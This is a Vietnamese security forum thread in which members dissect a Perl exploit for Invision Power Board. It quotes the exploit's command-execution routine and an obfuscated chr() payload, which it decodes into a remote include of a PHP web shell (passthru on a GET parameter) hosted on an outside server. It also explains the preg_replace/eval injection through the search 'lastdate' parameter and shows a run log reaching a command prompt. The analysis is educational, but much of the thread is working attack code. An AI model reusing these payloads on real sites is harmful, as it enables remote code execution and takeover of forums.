dondoc(VNISS) Invision Power Board Multiple Vulnerabilities (bài 2) Cái này lý thú đây, anh phân tích tiếp dondoc 1 phần nhé Trích: sub run() { $cmd =~ s/(.*);$/$1/eg; $cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $cmd2 = '%65%63%68%6F%20%5F%53%54%41%52%54%5F%20%26%26%20' ; $cmd2 .= $cmd; $cmd2 .= '%20%26%26%20%65%63%68%6F%20%5F%45%4E%44%5F'; $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED"; print $sock "GET ${dir}${get}&eharniy_ekibastos=$cmd2 HTTP/1.1\r\n"; print $sock "Host: $host\r\n"; print $sock "Cookie: session_id=$sid;\r\n"; print $sock "Connection: close\r\n\r\n"; $on = 0; $runned = 0; while ($answer = <$sock>) { if ($answer =~ /^_END_/) { return 0; } if ($on == 1) { print " $answer"; } if ($answer =~ /^_START_/) { $on = 1; } } } đây là đoạn code chủ yếu thực hiện lệnh, mấy khúc kia hầu hết để kiểm tra coi có thỏa điều kiện để khai thác hay không thôi Nếu để ý ta sẽ thấy cái này print $sock "GET ${dir}${get}&eharniy_ekibastos=$cmd2 eharniy_ekibastos là cái quái gì thế nhỉ Giờ xem lại đoạn code trên, cái phần mà dondoc gọi là giun dế ấy xem nó có gì nào Trích: $text = 'r57ipbxplhohohoeval(include(chr(104).chr(116).chr (116).chr(112).chr(58).chr(47).chr(47).chr(114).ch r(115).chr(116).chr(46).chr(118).chr(111).chr(105) .chr(100).chr(46).chr(114).chr(117).chr(47).chr(11 4).chr(53)'. '.chr(55).chr(105).chr(112).chr(98).chr(105).chr(1 10).chr(99).chr(46).chr(116).chr(120).chr(116))); //'; đây chính là đoạn text tự động post vào forum victim. Cái đó dịch ra sẽ là: $text = 'r57ipbxplhohohoeval(http://rst.void.ru/r57ipbinc.txt)); //'; O la la, lòi ra 1 cái địa chỉ vào đó xem thử có cái chi nhé Trích: <? /* r57ipbce exploit include file */ passthru($_GET['eharniy_ekibastos']); ?> bây giờ thì đã rõ eharniy_ekibastos là cái khỉ gỉ rồi nhé. Có thể tóm tắt như thế này, eval(include('http://rst.void.ru/r57ipbinc.txt') căn bản chính là 1 con shell dạng đơn giản nhất. Nhưng nếu post bình thường thì nó chỉ là text. Tuy nhiên nếu tận dụng tính năng search của IPB, chính là phần nó bị lỗi, với một số điều chỉnh quan trọng là lastdate=z|eval.*?%20//)%23e%00'; biến lastdate có dạng như thế sẽ đánh lừa hàm preg_replace() và khiến php sẽ run eval(include('http://rst.void.ru/r57ipbinc.txt') như là 1 câu lệnh php chứ không phải một đoạn text. Vài lời lạm bàn . Lỗi này nói chung là rất nguy hiểm. DarkHawk(VNISS) Invision Power Board Multiple Vulnerabilities (bài 3) Phục anh DarkHawk sát đất Mà cái đoạn giun dế kia nó encrypt kiểu gì vậy anh ! Em thấy nó post lên forum mà ko hiểu là cái gì , anh DH phân tích mới biết Mà cái lệnh eval có tác dụng gì nhỉ , em quên mất òi :o 1 số trang ko khai thác được là sao nhỉ , trừ cái đầu vào có vấn đề và nó đặt sub domain như forum.victim.com ! À anh DH biết perl có thể chỉnh lại code để run được với những site xài sub domain ko @flubber : Cái xpl0it này nó chia làm nhiều giai đoạn : - Đầu tiên là khai báo giá trị cho các biến , đặc biệt là cái $forum để có thể post con shell đã encrypt lên forum ! - Đến bước thứ 2 check phần login ,nếu khai báo đúng thì [DONE] , sai FAILED - Bước 3 check md5 cái $forum và một số thứ khác : Code: if($version==1) { print $sock "GET ${dir}index.php?act=post&do=new_post&f=${forum} HTTP/1.1\r\n"; } else { print $sock "GET ${dir}index.php?act=Post&CODE=00&f=${forum} HTTP/1.1\r\n"; } - Bước 4 tạo messenger , con shell encrypt được post lên ở đoạn này đây ,và là đoạn text (xem trên forum sẽ thấy): Trích: $text = 'r57ipbxplhohohoeval(include(chr(104).chr(116).chr (116).chr(112).chr(58).chr(47).chr(47).chr(114).ch r(115).chr(116).chr(46).chr(118).chr(111).chr(105) .chr(100).chr(46).chr(114).chr(117).chr(47).chr(11 4).chr(53)'. '.chr(55).chr(105).chr(112).chr(98).chr(105).chr(1 10).chr(99).chr(46).chr(116).chr(120).chr(116))); //'; - Bước 5 là lợi dụng lỗi ở phần search để run cái này eval(include('http://rst.void.ru/r57ipbinc.txt') như anh DH đã nói : Mỗi phần đều có cái connect này , thử xem lại khai báo host xem Trích: Line 40 : $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED"; flubber Xem lỗi chỗ nào đây : Trích: [~] Login [ DONE ] [+] SID: 2d04e43784542037d3754c5872559a43 [~] Try get md5_check [ DONE ] [+] MD5_CHECK : 598013a56493602d5a2273caf194a9f7 [~] Create new message [ DONE ] [~] Search message [ DONE ] [+] SEARCHID: 1211f8b1dfc5aaa24051dd649d084122 Command for execute or 'exit' for exit # id dondoc(VNISS) Invision Power Board Multiple Vulnerabilities (bài 4)